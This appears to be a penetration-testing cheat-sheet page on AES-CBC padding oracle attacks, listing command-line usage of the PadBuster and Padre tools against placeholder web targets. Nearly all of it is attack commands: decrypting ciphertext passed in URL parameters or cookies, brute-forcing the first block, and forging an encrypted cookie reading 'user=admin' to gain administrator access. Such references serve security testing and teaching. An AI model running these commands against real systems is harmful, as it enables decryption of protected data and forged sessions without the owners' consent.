AES-CBC Padding Oracle Attack
Last modified: 2024-07-28
Automation
PadBuster
PadBuster is an automated script for performing Padding Oracle attacks. It’s useful to decrypt AES.
# Encrypted Sample -> 2hN2bBPw==
# 16 -> Block site
# -encoding: 0->Base64, 1->Lower Hex, 2->Upper Hex, 3->NET UrlToken, 4->WebSafe Base64
padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0
# -bruteforce: Brute force against the first block
padbuster https://vulnerable.com/?data=2hN2bBPw== 2hN2bBPw== 16 -encoding 0 -bruteforce
# -cookies: specify cookie value
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw=="
# -plaintext: specify plain text
padbuster https://vulnerable.com/ 2hN2bBPw== 8 -encoding 0 -cookies "secret=2hN2bBPw==" -plaintext "user=admin"
Padre
Padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption.
# Cookie
padre -u 'https://example.com/profile.php' -cookie 'SESS=$' 'ABCD=='
# Path
padre -u 'https://example.com/profile/$' 'ABCD=='
# -e: Specify encode type ('b64' or 'lhex')
padre -u 'https://example.com/profile/$' -e lhex '1234abcd...'
# -err: Error response contents pattern (regex)
padre -u 'https://example.com/profile/$' -err 'Error' 'ABCD=='